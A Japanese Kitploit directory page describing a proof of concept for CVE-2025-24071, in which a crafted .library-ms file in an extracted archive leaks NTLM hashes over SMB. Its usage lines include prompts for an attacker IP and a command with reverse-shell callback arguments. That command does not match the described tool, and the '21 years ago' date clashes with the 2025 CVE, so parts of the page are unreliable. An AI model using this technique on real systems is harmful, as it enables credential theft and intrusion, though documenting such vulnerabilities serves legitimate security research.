Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-24071 — CVE-2025-24071の概念実証。RAR/ZIPアーカイブ内の巧妙に細工された.library-msファイルを介したNTLMハッシュ漏洩を実証し、解凍時にSMB認証をトリガーします。 | Kitploit
ツール/GitHubGitHub/royall-researchers/cve-2025-24071
偵察パスワード攻撃脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集
GitHubroyall-researchers/cve-2025-24071

CVE-2025-24071

CVE-2025-24071の概念実証。RAR/ZIPアーカイブ内の巧妙に細工された.library-msファイルを介したNTLMハッシュ漏洩を実証し、解凍時にSMB認証をトリガーします。

リポジトリを見る
21年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-24071_PoC

CVE-2025-24071: RAR/ZIP 展開と .library-ms ファイルによる NTLM ハッシュ漏洩

Windows Explorer は、.rar アーカイブから .library-ms ファイルが展開されると自動的に SMB 認証リクエストを開始し、NTLM ハッシュを漏洩させます。ユーザーがファイルを開いたり実行したりする必要はなく、展開するだけで漏洩がトリガーされます。

使用方法

root@kitploit:~

>>python poc.py

>>enter file name: your file name

>>enter IP: attacker IP
root@kitploit:~
>>python3 poc.py --url http://domainname.com --user admin --password password --reverse-ip 10.10.10.10 --reverse-port 8888

更新:

更新: Microsoft は CVE 番号を変更しました。以前 Microsoft が定義していた CVE-2025-24071 は、CVE-2025-24054 に更新されました。🤷‍♂

ツールをダウンロード